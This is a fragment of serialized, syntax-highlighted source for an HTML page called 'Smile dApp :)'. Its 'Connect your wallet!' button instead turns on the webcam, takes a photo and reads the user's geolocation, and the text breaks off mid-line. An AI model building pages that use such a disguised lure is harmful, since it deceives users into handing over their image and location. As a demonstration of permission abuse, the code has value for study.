\u003C/script>\n\u003C/body>\n\u003C/html>\n",[160890],{"type":25,"tag":82,"props":160891,"children":160892},{"__ignoreMap":7},[160893,160913,160928,160944,160974,160997,161012,161027,161059,161105,161141,161169,161184,161230,161276,161284,161352,161380,161395,161403,161410,161430,161490,161531,161560,161601,161608,161637,161675,161712,161719,161726,161759,161780,161787,161849,161905,161941,161987,161995,162002,162045,162078,162203,162236,162243,162250,162257,162269,162284,162299],{"type":25,"tag":216,"props":160894,"children":160895},{"class":6922,"line":6923},[160896,160900,160904,160909],{"type":25,"tag":216,"props":160897,"children":160898},{"style":36338},[160899],{"type":31,"value":38188},{"type":25,"tag":216,"props":160901,"children":160902},{"style":6936},[160903],{"type":31,"value":38193},{"type":25,"tag":216,"props":160905,"children":160906},{"style":6947},[160907],{"type":31,"value":160908}," html",{"type":25,"tag":216,"props":160910,"children":160911},{"style":36338},[160912],{"type":31,"value":9943},{"type":25,"tag":216,"props":160914,"children":160915},{"class":6922,"line":6769},[160916,160920,160924],{"type":25,"tag":216,"props":160917,"children":160918},{"style":36338},[160919],{"type":31,"value":9757},{"type":25,"tag":216,"props":160921,"children":160922},{"style":6936},[160923],{"type":31,"value":36345},{"type":25,"tag":216,"props":160925,"children":160926},{"style":36338},[160927],{"type":31,"value":9943},{"type":25,"tag":216,"props":160929,"children":160930},{"class":6922,"line":6778},[160931,160935,160940],{"type":25,"tag":216,"props":160932,"children":160933},{"style":36338},[160934],{"type":31,"value":9757},{"type":25,"tag":216,"props":160936,"children":160937},{"style":6936},[160938],{"type":31,"value":160939},"head",{"type":25,"tag":216,"props":160941,"children":160942},{"style":36338},[160943],{"type":31,"value":9943},{"type":25,"tag":216,"props":160945,"children":160946},{"class":6922,"line":7005},[160947,160951,160956,160961,160965,160970],{"type":25,"tag":216,"props":160948,"children":160949},{"style":36338},[160950],{"type":31,"value":36408},{"type":25,"tag":216,"props":160952,"children":160953},{"style":6936},[160954],{"type":31,"value":160955},"meta",{"type":25,"tag":216,"props":160957,"children":160958},{"style":6947},[160959],{"type":31,"value":160960}," charset",{"type":25,"tag":216,"props":160962,"children":160963},{"style":6964},[160964],{"type":31,"value":266},{"type":25,"tag":216,"props":160966,"children":160967},{"style":8205},[160968],{"type":31,"value":160969},"\"utf-8\"",{"type":25,"tag":216,"props":160971,"children":160972},{"style":36338},[160973],{"type":31,"value":9943},{"type":25,"tag":216,"props":160975,"children":160976},{"class":6922,"line":7110},[160977,160981,160985,160989,160993],{"type":25,"tag":216,"props":160978,"children":160979},{"style":36338},[160980],{"type":31,"value":36408},{"type":25,"tag":216,"props":160982,"children":160983},{"style":6936},[160984],{"type":31,"value":38266},{"type":25,"tag":216,"props":160986,"children":160987},{"style":36338},[160988],{"type":31,"value":54034},{"type":25,"tag":216,"props":160990,"children":160991},{"style":6936},[160992],{"type":31,"value":38266},{"type":25,"tag":216,"props":160994,"children":160995},{"style":36338},[160996],{"type":31,"value":9943},{"type":25,"tag":216,"props":160998,"children":160999},{"class":6922,"line":7216},[161000,161004,161008],{"type":25,"tag":216,"props":161001,"children":161002},{"style":36338},[161003],{"type":31,"value":36392},{"type":25,"tag":216,"props":161005,"children":161006},{"style":6936},[161007],{"type":31,"value":160939},{"type":25,"tag":216,"props":161009,"children":161010},{"style":36338},[161011],{"type":31,"value":9943},{"type":25,"tag":216,"props":161013,"children":161014},{"class":6922,"line":7244},[161015,161019,161023],{"type":25,"tag":216,"props":161016,"children":161017},{"style":36338},[161018],{"type":31,"value":9757},{"type":25,"tag":216,"props":161020,"children":161021},{"style":6936},[161022],{"type":31,"value":36362},{"type":25,"tag":216,"props":161024,"children":161025},{"style":36338},[161026],{"type":31,"value":9943},{"type":25,"tag":216,"props":161028,"children":161029},{"class":6922,"line":7257},[161030,161034,161038,161042,161047,161051,161055],{"type":25,"tag":216,"props":161031,"children":161032},{"style":36338},[161033],{"type":31,"value":36408},{"type":25,"tag":216,"props":161035,"children":161036},{"style":6936},[161037],{"type":31,"value":26},{"type":25,"tag":216,"props":161039,"children":161040},{"style":36338},[161041],{"type":31,"value":5902},{"type":25,"tag":216,"props":161043,"children":161044},{"style":6964},[161045],{"type":31,"value":161046},"Smile dApp :)",{"type":25,"tag":216,"props":161048,"children":161049},{"style":36338},[161050],{"type":31,"value":36392},{"type":25,"tag":216,"props":161052,"children":161053},{"style":6936},[161054],{"type":31,"value":26},{"type":25,"tag":216,"props":161056,"children":161057},{"style":36338},[161058],{"type":31,"value":9943},{"type":25,"tag":216,"props":161060,"children":161061},{"class":6922,"line":7275},[161062,161066,161071,161075,161079,161084,161088,161093,161097,161101],{"type":25,"tag":216,"props":161063,"children":161064},{"style":36338},[161065],{"type":31,"value":36408},{"type":25,"tag":216,"props":161067,"children":161068},{"style":6936},[161069],{"type":31,"value":161070},"button",{"type":25,"tag":216,"props":161072,"children":161073},{"style":6947},[161074],{"type":31,"value":36418},{"type":25,"tag":216,"props":161076,"children":161077},{"style":6964},[161078],{"type":31,"value":266},{"type":25,"tag":216,"props":161080,"children":161081},{"style":8205},[161082],{"type":31,"value":161083},"\"connect\"",{"type":25,"tag":216,"props":161085,"children":161086},{"style":36338},[161087],{"type":31,"value":5902},{"type":25,"tag":216,"props":161089,"children":161090},{"style":6964},[161091],{"type":31,"value":161092},"Connect your wallet!",{"type":25,"tag":216,"props":161094,"children":161095},{"style":36338},[161096],{"type":31,"value":36392},{"type":25,"tag":216,"props":161098,"children":161099},{"style":6936},[161100],{"type":31,"value":161070},{"type":25,"tag":216,"props":161102,"children":161103},{"style":36338},[161104],{"type":31,"value":9943},{"type":25,"tag":216,"props":161106,"children":161107},{"class":6922,"line":7296},[161108,161112,161116,161120,161124,161129,161133,161137],{"type":25,"tag":216,"props":161109,"children":161110},{"style":36338},[161111],{"type":31,"value":36408},{"type":25,"tag":216,"props":161113,"children":161114},{"style":6936},[161115],{"type":31,"value":206},{"type":25,"tag":216,"props":161117,"children":161118},{"style":6947},[161119],{"type":31,"value":36418},{"type":25,"tag":216,"props":161121,"children":161122},{"style":6964},[161123],{"type":31,"value":266},{"type":25,"tag":216,"props":161125,"children":161126},{"style":8205},[161127],{"type":31,"value":161128},"\"gps\"",{"type":25,"tag":216,"props":161130,"children":161131},{"style":36338},[161132],{"type":31,"value":54034},{"type":25,"tag":216,"props":161134,"children":161135},{"style":6936},[161136],{"type":31,"value":206},{"type":25,"tag":216,"props":161138,"children":161139},{"style":36338},[161140],{"type":31,"value":9943},{"type":25,"tag":216,"props":161142,"children":161143},{"class":6922,"line":7305},[161144,161148,161152,161156,161160,161165],{"type":25,"tag":216,"props":161145,"children":161146},{"style":36338},[161147],{"type":31,"value":36408},{"type":25,"tag":216,"props":161149,"children":161150},{"style":6936},[161151],{"type":31,"value":6467},{"type":25,"tag":216,"props":161153,"children":161154},{"style":6947},[161155],{"type":31,"value":36418},{"type":25,"tag":216,"props":161157,"children":161158},{"style":6964},[161159],{"type":31,"value":266},{"type":25,"tag":216,"props":161161,"children":161162},{"style":8205},[161163],{"type":31,"value":161164},"\"pic\"",{"type":25,"tag":216,"props":161166,"children":161167},{"style":36338},[161168],{"type":31,"value":9943},{"type":25,"tag":216,"props":161170,"children":161171},{"class":6922,"line":7557},[161172,161176,161180],{"type":25,"tag":216,"props":161173,"children":161174},{"style":36338},[161175],{"type":31,"value":36408},{"type":25,"tag":216,"props":161177,"children":161178},{"style":6936},[161179],{"type":31,"value":36378},{"type":25,"tag":216,"props":161181,"children":161182},{"style":36338},[161183],{"type":31,"value":9943},{"type":25,"tag":216,"props":161185,"children":161186},{"class":6922,"line":7574},[161187,161192,161196,161201,161205,161210,161214,161218,161222,161226],{"type":25,"tag":216,"props":161188,"children":161189},{"style":6947},[161190],{"type":31,"value":161191},"        window",{"type":25,"tag":216,"props":161193,"children":161194},{"style":6953},[161195],{"type":31,"value":179},{"type":25,"tag":216,"props":161197,"children":161198},{"style":7047},[161199],{"type":31,"value":161200},"addEventListener",{"type":25,"tag":216,"props":161202,"children":161203},{"style":6953},[161204],{"type":31,"value":1850},{"type":25,"tag":216,"props":161206,"children":161207},{"style":8205},[161208],{"type":31,"value":161209},"'unhandledrejection'",{"type":25,"tag":216,"props":161211,"children":161212},{"style":6953},[161213],{"type":31,"value":7026},{"type":25,"tag":216,"props":161215,"children":161216},{"style":6936},[161217],{"type":31,"value":35339},{"type":25,"tag":216,"props":161219,"children":161220},{"style":6953},[161221],{"type":31,"value":7016},{"type":25,"tag":216,"props":161223,"children":161224},{"style":6947},[161225],{"type":31,"value":86100},{"type":25,"tag":216,"props":161227,"children":161228},{"style":6953},[161229],{"type":31,"value":18761},{"type":25,"tag":216,"props":161231,"children":161232},{"class":6922,"line":7591},[161233,161238,161242,161247,161251,161255,161259,161264,161268,161272],{"type":25,"tag":216,"props":161234,"children":161235},{"style":7047},[161236],{"type":31,"value":161237},"            alert",{"type":25,"tag":216,"props":161239,"children":161240},{"style":6953},[161241],{"type":31,"value":1850},{"type":25,"tag":216,"props":161243,"children":161244},{"style":8205},[161245],{"type":31,"value":161246},"`Unhandled Promise Rejection: ",{"type":25,"tag":216,"props":161248,"children":161249},{"style":6936},[161250],{"type":31,"value":38071},{"type":25,"tag":216,"props":161252,"children":161253},{"style":6947},[161254],{"type":31,"value":86100},{"type":25,"tag":216,"props":161256,"children":161257},{"style":6953},[161258],{"type":31,"value":179},{"type":25,"tag":216,"props":161260,"children":161261},{"style":6947},[161262],{"type":31,"value":161263},"reason",{"type":25,"tag":216,"props":161265,"children":161266},{"style":6936},[161267],{"type":31,"value":38103},{"type":25,"tag":216,"props":161269,"children":161270},{"style":8205},[161271],{"type":31,"value":14339},{"type":25,"tag":216,"props":161273,"children":161274},{"style":6953},[161275],{"type":31,"value":7797},{"type":25,"tag":216,"props":161277,"children":161278},{"class":6922,"line":7604},[161279],{"type":25,"tag":216,"props":161280,"children":161281},{"style":6953},[161282],{"type":31,"value":161283},"        });\n",{"type":25,"tag":216,"props":161285,"children":161286},{"class":6922,"line":7613},[161287,161291,161295,161299,161303,161307,161311,161315,161319,161323,161327,161331,161335,161340,161344,161348],{"type":25,"tag":216,"props":161288,"children":161289},{"style":6947},[161290],{"type":31,"value":161191},{"type":25,"tag":216,"props":161292,"children":161293},{"style":6953},[161294],{"type":31,"value":179},{"type":25,"tag":216,"props":161296,"children":161297},{"style":7047},[161298],{"type":31,"value":36651},{"type":25,"tag":216,"props":161300,"children":161301},{"style":6953},[161302],{"type":31,"value":4983},{"type":25,"tag":216,"props":161304,"children":161305},{"style":6936},[161306],{"type":31,"value":35339},{"type":25,"tag":216,"props":161308,"children":161309},{"style":6953},[161310],{"type":31,"value":7016},{"type":25,"tag":216,"props":161312,"children":161313},{"style":6947},[161314],{"type":31,"value":61914},{"type":25,"tag":216,"props":161316,"children":161317},{"style":6953},[161318],{"type":31,"value":7026},{"type":25,"tag":216,"props":161320,"children":161321},{"style":6947},[161322],{"type":31,"value":74347},{"type":25,"tag":216,"props":161324,"children":161325},{"style":6953},[161326],{"type":31,"value":7026},{"type":25,"tag":216,"props":161328,"children":161329},{"style":6947},[161330],{"type":31,"value":6922},{"type":25,"tag":216,"props":161332,"children":161333},{"style":6953},[161334],{"type":31,"value":7026},{"type":25,"tag":216,"props":161336,"children":161337},{"style":6947},[161338],{"type":31,"value":161339},"col",{"type":25,"tag":216,"props":161341,"children":161342},{"style":6953},[161343],{"type":31,"value":7026},{"type":25,"tag":216,"props":161345,"children":161346},{"style":6947},[161347],{"type":31,"value":18821},{"type":25,"tag":216,"props":161349,"children":161350},{"style":6953},[161351],{"type":31,"value":18761},{"type":25,"tag":216,"props":161353,"children":161354},{"class":6922,"line":7636},[161355,161359,161363,161368,161372,161376],{"type":25,"tag":216,"props":161356,"children":161357},{"style":7047},[161358],{"type":31,"value":161237},{"type":25,"tag":216,"props":161360,"children":161361},{"style":6953},[161362],{"type":31,"value":1850},{"type":25,"tag":216,"props":161364,"children":161365},{"style":8205},[161366],{"type":31,"value":161367},"'onerror: '",{"type":25,"tag":216,"props":161369,"children":161370},{"style":6953},[161371],{"type":31,"value":38659},{"type":25,"tag":216,"props":161373,"children":161374},{"style":6947},[161375],{"type":31,"value":61914},{"type":25,"tag":216,"props":161377,"children":161378},{"style":6953},[161379],{"type":31,"value":7797},{"type":25,"tag":216,"props":161381,"children":161382},{"class":6922,"line":7645},[161383,161387,161391],{"type":25,"tag":216,"props":161384,"children":161385},{"style":6973},[161386],{"type":31,"value":83048},{"type":25,"tag":216,"props":161388,"children":161389},{"style":6936},[161390],{"type":31,"value":13012},{"type":25,"tag":216,"props":161392,"children":161393},{"style":6953},[161394],{"type":31,"value":6967},{"type":25,"tag":216,"props":161396,"children":161397},{"class":6922,"line":7654},[161398],{"type":25,"tag":216,"props":161399,"children":161400},{"style":6953},[161401],{"type":31,"value":161402},"        };\n",{"type":25,"tag":216,"props":161404,"children":161405},{"class":6922,"line":7722},[161406],{"type":25,"tag":216,"props":161407,"children":161408},{"emptyLinePlaceholder":16},[161409],{"type":31,"value":7642},{"type":25,"tag":216,"props":161411,"children":161412},{"class":6922,"line":7730},[161413,161418,161422,161426],{"type":25,"tag":216,"props":161414,"children":161415},{"style":6936},[161416],{"type":31,"value":161417},"        async",{"type":25,"tag":216,"props":161419,"children":161420},{"style":6936},[161421],{"type":31,"value":42177},{"type":25,"tag":216,"props":161423,"children":161424},{"style":7047},[161425],{"type":31,"value":94751},{"type":25,"tag":216,"props":161427,"children":161428},{"style":6953},[161429],{"type":31,"value":19694},{"type":25,"tag":216,"props":161431,"children":161432},{"class":6922,"line":7760},[161433,161437,161442,161446,161450,161455,161459,161464,161468,161473,161477,161482,161486],{"type":25,"tag":216,"props":161434,"children":161435},{"style":6936},[161436],{"type":31,"value":154963},{"type":25,"tag":216,"props":161438,"children":161439},{"style":6947},[161440],{"type":31,"value":161441}," stream",{"type":25,"tag":216,"props":161443,"children":161444},{"style":6953},[161445],{"type":31,"value":4983},{"type":25,"tag":216,"props":161447,"children":161448},{"style":6973},[161449],{"type":31,"value":36878},{"type":25,"tag":216,"props":161451,"children":161452},{"style":6947},[161453],{"type":31,"value":161454}," navigator",{"type":25,"tag":216,"props":161456,"children":161457},{"style":6953},[161458],{"type":31,"value":179},{"type":25,"tag":216,"props":161460,"children":161461},{"style":6947},[161462],{"type":31,"value":161463},"mediaDevices",{"type":25,"tag":216,"props":161465,"children":161466},{"style":6953},[161467],{"type":31,"value":179},{"type":25,"tag":216,"props":161469,"children":161470},{"style":7047},[161471],{"type":31,"value":161472},"getUserMedia",{"type":25,"tag":216,"props":161474,"children":161475},{"style":6953},[161476],{"type":31,"value":35460},{"type":25,"tag":216,"props":161478,"children":161479},{"style":6947},[161480],{"type":31,"value":161481},"video:",{"type":25,"tag":216,"props":161483,"children":161484},{"style":6936},[161485],{"type":31,"value":16425},{"type":25,"tag":216,"props":161487,"children":161488},{"style":6953},[161489],{"type":31,"value":42798},{"type":25,"tag":216,"props":161491,"children":161492},{"class":6922,"line":7768},[161493,161497,161502,161506,161510,161514,161518,161522,161527],{"type":25,"tag":216,"props":161494,"children":161495},{"style":6936},[161496],{"type":31,"value":154963},{"type":25,"tag":216,"props":161498,"children":161499},{"style":6947},[161500],{"type":31,"value":161501}," video",{"type":25,"tag":216,"props":161503,"children":161504},{"style":6953},[161505],{"type":31,"value":4983},{"type":25,"tag":216,"props":161507,"children":161508},{"style":6947},[161509],{"type":31,"value":36670},{"type":25,"tag":216,"props":161511,"children":161512},{"style":6953},[161513],{"type":31,"value":179},{"type":25,"tag":216,"props":161515,"children":161516},{"style":7047},[161517],{"type":31,"value":40684},{"type":25,"tag":216,"props":161519,"children":161520},{"style":6953},[161521],{"type":31,"value":1850},{"type":25,"tag":216,"props":161523,"children":161524},{"style":8205},[161525],{"type":31,"value":161526},"\"video\"",{"type":25,"tag":216,"props":161528,"children":161529},{"style":6953},[161530],{"type":31,"value":7797},{"type":25,"tag":216,"props":161532,"children":161533},{"class":6922,"line":7800},[161534,161539,161543,161548,161552,161556],{"type":25,"tag":216,"props":161535,"children":161536},{"style":6947},[161537],{"type":31,"value":161538},"            video",{"type":25,"tag":216,"props":161540,"children":161541},{"style":6953},[161542],{"type":31,"value":179},{"type":25,"tag":216,"props":161544,"children":161545},{"style":6947},[161546],{"type":31,"value":161547},"srcObject",{"type":25,"tag":216,"props":161549,"children":161550},{"style":6953},[161551],{"type":31,"value":4983},{"type":25,"tag":216,"props":161553,"children":161554},{"style":6947},[161555],{"type":31,"value":40224},{"type":25,"tag":216,"props":161557,"children":161558},{"style":6953},[161559],{"type":31,"value":6967},{"type":25,"tag":216,"props":161561,"children":161562},{"class":6922,"line":7808},[161563,161567,161572,161576,161580,161584,161588,161592,161597],{"type":25,"tag":216,"props":161564,"children":161565},{"style":6936},[161566],{"type":31,"value":154963},{"type":25,"tag":216,"props":161568,"children":161569},{"style":6947},[161570],{"type":31,"value":161571}," canvas",{"type":25,"tag":216,"props":161573,"children":161574},{"style":6953},[161575],{"type":31,"value":4983},{"type":25,"tag":216,"props":161577,"children":161578},{"style":6947},[161579],{"type":31,"value":36670},{"type":25,"tag":216,"props":161581,"children":161582},{"style":6953},[161583],{"type":31,"value":179},{"type":25,"tag":216,"props":161585,"children":161586},{"style":7047},[161587],{"type":31,"value":40684},{"type":25,"tag":216,"props":161589,"children":161590},{"style":6953},[161591],{"type":31,"value":1850},{"type":25,"tag":216,"props":161593,"children":161594},{"style":8205},[161595],{"type":31,"value":161596},"\"canvas\"",{"type":25,"tag":216,"props":161598,"children":161599},{"style":6953},[161600],{"type":31,"value":7797},{"type":25,"tag":216,"props":161602,"children":161603},{"class":6922,"line":7868},[161604],{"type":25,"tag":216,"props":161605,"children":161606},{"emptyLinePlaceholder":16},[161607],{"type":31,"value":7642},{"type":25,"tag":216,"props":161609,"children":161610},{"class":6922,"line":13001},[161611,161615,161619,161624,161629,161633],{"type":25,"tag":216,"props":161612,"children":161613},{"style":6947},[161614],{"type":31,"value":161538},{"type":25,"tag":216,"props":161616,"children":161617},{"style":6953},[161618],{"type":31,"value":179},{"type":25,"tag":216,"props":161620,"children":161621},{"style":7047},[161622],{"type":31,"value":161623},"onloadedmetadata",{"type":25,"tag":216,"props":161625,"children":161626},{"style":6953},[161627],{"type":31,"value":161628}," = () ",{"type":25,"tag":216,"props":161630,"children":161631},{"style":6936},[161632],{"type":31,"value":18779},{"type":25,"tag":216,"props":161634,"children":161635},{"style":6953},[161636],{"type":31,"value":7241},{"type":25,"tag":216,"props":161638,"children":161639},{"class":6922,"line":13019},[161640,161645,161649,161654,161658,161662,161666,161671],{"type":25,"tag":216,"props":161641,"children":161642},{"style":6947},[161643],{"type":31,"value":161644},"                canvas",{"type":25,"tag":216,"props":161646,"children":161647},{"style":6953},[161648],{"type":31,"value":179},{"type":25,"tag":216,"props":161650,"children":161651},{"style":6947},[161652],{"type":31,"value":161653},"width",{"type":25,"tag":216,"props":161655,"children":161656},{"style":6953},[161657],{"type":31,"value":4983},{"type":25,"tag":216,"props":161659,"children":161660},{"style":6947},[161661],{"type":31,"value":135790},{"type":25,"tag":216,"props":161663,"children":161664},{"style":6953},[161665],{"type":31,"value":179},{"type":25,"tag":216,"props":161667,"children":161668},{"style":6947},[161669],{"type":31,"value":161670},"videoWidth",{"type":25,"tag":216,"props":161672,"children":161673},{"style":6953},[161674],{"type":31,"value":6967},{"type":25,"tag":216,"props":161676,"children":161677},{"class":6922,"line":13064},[161678,161682,161686,161691,161695,161699,161703,161708],{"type":25,"tag":216,"props":161679,"children":161680},{"style":6947},[161681],{"type":31,"value":161644},{"type":25,"tag":216,"props":161683,"children":161684},{"style":6953},[161685],{"type":31,"value":179},{"type":25,"tag":216,"props":161687,"children":161688},{"style":6947},[161689],{"type":31,"value":161690},"height",{"type":25,"tag":216,"props":161692,"children":161693},{"style":6953},[161694],{"type":31,"value":4983},{"type":25,"tag":216,"props":161696,"children":161697},{"style":6947},[161698],{"type":31,"value":135790},{"type":25,"tag":216,"props":161700,"children":161701},{"style":6953},[161702],{"type":31,"value":179},{"type":25,"tag":216,"props":161704,"children":161705},{"style":6947},[161706],{"type":31,"value":161707},"videoHeight",{"type":25,"tag":216,"props":161709,"children":161710},{"style":6953},[161711],{"type":31,"value":6967},{"type":25,"tag":216,"props":161713,"children":161714},{"class":6922,"line":13170},[161715],{"type":25,"tag":216,"props":161716,"children":161717},{"style":6953},[161718],{"type":31,"value":52043},{"type":25,"tag":216,"props":161720,"children":161721},{"class":6922,"line":27455},[161722],{"type":25,"tag":216,"props":161723,"children":161724},{"emptyLinePlaceholder":16},[161725],{"type":31,"value":7642},{"type":25,"tag":216,"props":161727,"children":161728},{"class":6922,"line":27490},[161729,161734,161738,161743,161747,161751,161755],{"type":25,"tag":216,"props":161730,"children":161731},{"style":6947},[161732],{"type":31,"value":161733},"            connect",{"type":25,"tag":216,"props":161735,"children":161736},{"style":6953},[161737],{"type":31,"value":179},{"type":25,"tag":216,"props":161739,"children":161740},{"style":7047},[161741],{"type":31,"value":161742},"onclick",{"type":25,"tag":216,"props":161744,"children":161745},{"style":6953},[161746],{"type":31,"value":4983},{"type":25,"tag":216,"props":161748,"children":161749},{"style":6947},[161750],{"type":31,"value":2399},{"type":25,"tag":216,"props":161752,"children":161753},{"style":6936},[161754],{"type":31,"value":31711},{"type":25,"tag":216,"props":161756,"children":161757},{"style":6953},[161758],{"type":31,"value":7241},{"type":25,"tag":216,"props":161760,"children":161761},{"class":6922,"line":27498},[161762,161767,161771,161776],{"type":25,"tag":216,"props":161763,"children":161764},{"style":6947},[161765],{"type":31,"value":161766},"                video",{"type":25,"tag":216,"props":161768,"children":161769},{"style":6953},[161770],{"type":31,"value":179},{"type":25,"tag":216,"props":161772,"children":161773},{"style":7047},[161774],{"type":31,"value":161775},"play",{"type":25,"tag":216,"props":161777,"children":161778},{"style":6953},[161779],{"type":31,"value":7633},{"type":25,"tag":216,"props":161781,"children":161782},{"class":6922,"line":27506},[161783],{"type":25,"tag":216,"props":161784,"children":161785},{"emptyLinePlaceholder":16},[161786],{"type":31,"value":7642},{"type":25,"tag":216,"props":161788,"children":161789},{"class":6922,"line":27515},[161790,161794,161798,161803,161807,161812,161816,161821,161825,161829,161833,161837,161841,161845],{"type":25,"tag":216,"props":161791,"children":161792},{"style":6947},[161793],{"type":31,"value":161644},{"type":25,"tag":216,"props":161795,"children":161796},{"style":6953},[161797],{"type":31,"value":179},{"type":25,"tag":216,"props":161799,"children":161800},{"style":7047},[161801],{"type":31,"value":161802},"getContext",{"type":25,"tag":216,"props":161804,"children":161805},{"style":6953},[161806],{"type":31,"value":1850},{"type":25,"tag":216,"props":161808,"children":161809},{"style":8205},[161810],{"type":31,"value":161811},"\"2d\"",{"type":25,"tag":216,"props":161813,"children":161814},{"style":6953},[161815],{"type":31,"value":24702},{"type":25,"tag":216,"props":161817,"children":161818},{"style":7047},[161819],{"type":31,"value":161820},"drawImage",{"type":25,"tag":216,"props":161822,"children":161823},{"style":6953},[161824],{"type":31,"value":1850},{"type":25,"tag":216,"props":161826,"children":161827},{"style":6947},[161828],{"type":31,"value":135790},{"type":25,"tag":216,"props":161830,"children":161831},{"style":6953},[161832],{"type":31,"value":7026},{"type":25,"tag":216,"props":161834,"children":161835},{"style":6989},[161836],{"type":31,"value":1882},{"type":25,"tag":216,"props":161838,"children":161839},{"style":6953},[161840],{"type":31,"value":7026},{"type":25,"tag":216,"props":161842,"children":161843},{"style":6989},[161844],{"type":31,"value":1882},{"type":25,"tag":216,"props":161846,"children":161847},{"style":6953},[161848],{"type":31,"value":7797},{"type":25,"tag":216,"props":161850,"children":161851},{"class":6922,"line":27557},[161852,161857,161861,161866,161870,161875,161879,161883,161887,161892,161896,161901],{"type":25,"tag":216,"props":161853,"children":161854},{"style":6947},[161855],{"type":31,"value":161856},"                stream",{"type":25,"tag":216,"props":161858,"children":161859},{"style":6953},[161860],{"type":31,"value":179},{"type":25,"tag":216,"props":161862,"children":161863},{"style":7047},[161864],{"type":31,"value":161865},"getTracks",{"type":25,"tag":216,"props":161867,"children":161868},{"style":6953},[161869],{"type":31,"value":34129},{"type":25,"tag":216,"props":161871,"children":161872},{"style":7047},[161873],{"type":31,"value":161874},"forEach",{"type":25,"tag":216,"props":161876,"children":161877},{"style":6953},[161878],{"type":31,"value":1850},{"type":25,"tag":216,"props":161880,"children":161881},{"style":6947},[161882],{"type":31,"value":2934},{"type":25,"tag":216,"props":161884,"children":161885},{"style":6936},[161886],{"type":31,"value":31711},{"type":25,"tag":216,"props":161888,"children":161889},{"style":6947},[161890],{"type":31,"value":161891}," t",{"type":25,"tag":216,"props":161893,"children":161894},{"style":6953},[161895],{"type":31,"value":179},{"type":25,"tag":216,"props":161897,"children":161898},{"style":7047},[161899],{"type":31,"value":161900},"stop",{"type":25,"tag":216,"props":161902,"children":161903},{"style":6953},[161904],{"type":31,"value":19382},{"type":25,"tag":216,"props":161906,"children":161907},{"class":6922,"line":27590},[161908,161912,161916,161921,161925,161929,161933,161937],{"type":25,"tag":216,"props":161909,"children":161910},{"style":6947},[161911],{"type":31,"value":161644},{"type":25,"tag":216,"props":161913,"children":161914},{"style":6953},[161915],{"type":31,"value":179},{"type":25,"tag":216,"props":161917,"children":161918},{"style":7047},[161919],{"type":31,"value":161920},"toBlob",{"type":25,"tag":216,"props":161922,"children":161923},{"style":6953},[161924],{"type":31,"value":35485},{"type":25,"tag":216,"props":161926,"children":161927},{"style":6947},[161928],{"type":31,"value":36910},{"type":25,"tag":216,"props":161930,"children":161931},{"style":6953},[161932],{"type":31,"value":7036},{"type":25,"tag":216,"props":161934,"children":161935},{"style":6936},[161936],{"type":31,"value":18779},{"type":25,"tag":216,"props":161938,"children":161939},{"style":6953},[161940],{"type":31,"value":7241},{"type":25,"tag":216,"props":161942,"children":161943},{"class":6922,"line":27598},[161944,161949,161953,161957,161961,161966,161970,161975,161979,161983],{"type":25,"tag":216,"props":161945,"children":161946},{"style":6947},[161947],{"type":31,"value":161948},"                    pic",{"type":25,"tag":216,"props":161950,"children":161951},{"style":6953},[161952],{"type":31,"value":179},{"type":25,"tag":216,"props":161954,"children":161955},{"style":6947},[161956],{"type":31,"value":36632},{"type":25,"tag":216,"props":161958,"children":161959},{"style":6953},[161960],{"type":31,"value":4983},{"type":25,"tag":216,"props":161962,"children":161963},{"style":6947},[161964],{"type":31,"value":161965},"URL",{"type":25,"tag":216,"props":161967,"children":161968},{"style":6953},[161969],{"type":31,"value":179},{"type":25,"tag":216,"props":161971,"children":161972},{"style":7047},[161973],{"type":31,"value":161974},"createObjectURL",{"type":25,"tag":216,"props":161976,"children":161977},{"style":6953},[161978],{"type":31,"value":1850},{"type":25,"tag":216,"props":161980,"children":161981},{"style":6947},[161982],{"type":31,"value":36910},{"type":25,"tag":216,"props":161984,"children":161985},{"style":6953},[161986],{"type":31,"value":7797},{"type":25,"tag":216,"props":161988,"children":161989},{"class":6922,"line":27606},[161990],{"type":25,"tag":216,"props":161991,"children":161992},{"style":6953},[161993],{"type":31,"value":161994},"                });\n",{"type":25,"tag":216,"props":161996,"children":161997},{"class":6922,"line":27615},[161998],{"type":25,"tag":216,"props":161999,"children":162000},{"emptyLinePlaceholder":16},[162001],{"type":31,"value":7642},{"type":25,"tag":216,"props":162003,"children":162004},{"class":6922,"line":27691},[162005,162010,162014,162019,162023,162028,162032,162037,162041],{"type":25,"tag":216,"props":162006,"children":162007},{"style":6947},[162008],{"type":31,"value":162009},"                navigator",{"type":25,"tag":216,"props":162011,"children":162012},{"style":6953},[162013],{"type":31,"value":179},{"type":25,"tag":216,"props":162015,"children":162016},{"style":6947},[162017],{"type":31,"value":162018},"geolocation",{"type":25,"tag":216,"props":162020,"children":162021},{"style":6953},[162022],{"type":31,"value":179},{"type":25,"tag":216,"props":162024,"children":162025},{"style":7047},[162026],{"type":31,"value":162027},"getCurrentPosition",{"type":25,"tag":216,"props":162029,"children":162030},{"style":6953},[162031],{"type":31,"value":1850},{"type":25,"tag":216,"props":162033,"children":162034},{"style":6947},[162035],{"type":31,"value":162036},"pos",{"type":25,"tag":216,"props":162038,"children":162039},{"style":6936},[162040],{"type":31,"value":31711},{"type":25,"tag":216,"props":162042,"children":162043},{"style":6953},[162044],{"type":31,"value":7241},{"type":25,"tag":216,"props":162046,"children":162047},{"class":6922,"line":27724},[162048,162053,162057,162061,162065,162069,162074],{"type":25,"tag":216,"props":162049,"children":162050},{"style":6936},[162051],{"type":31,"value":162052},"                    const",{"type":25,"tag":216,"props":162054,"children":162055},{"style":6947},[162056],{"type":31,"value":41408},{"type":25,"tag":216,"props":162058,"children":162059},{"style":6953},[162060],{"type":31,"value":4983},{"type":25,"tag":216,"props":162062,"children":162063},{"style":6947},[162064],{"type":31,"value":162036},{"type":25,"tag":216,"props":162066,"children":162067},{"style":6953},[162068],{"type":31,"value":179},{"type":25,"tag":216,"props":162070,"children":162071},{"style":6947},[162072],{"type":31,"value":162073},"coords",{"type":25,"tag":216,"props":162075,"children":162076},{"style":6953},[162077],{"type":31,"value":6967},{"type":25,"tag":216,"props":162079,"children":162080},{"class":6922,"line":27732},[162081,162086,162090,162094,162098,162103,162107,162111,162115,162120,162124,162129,162133,162137,162141,162145,162149,162154,162158,162162,162166,162171,162175,162179,162183,162187,162191,162195,162199],{"type":25,"tag":216,"props":162082,"children":162083},{"style":6947},[162084],{"type":31,"value":162085},"                    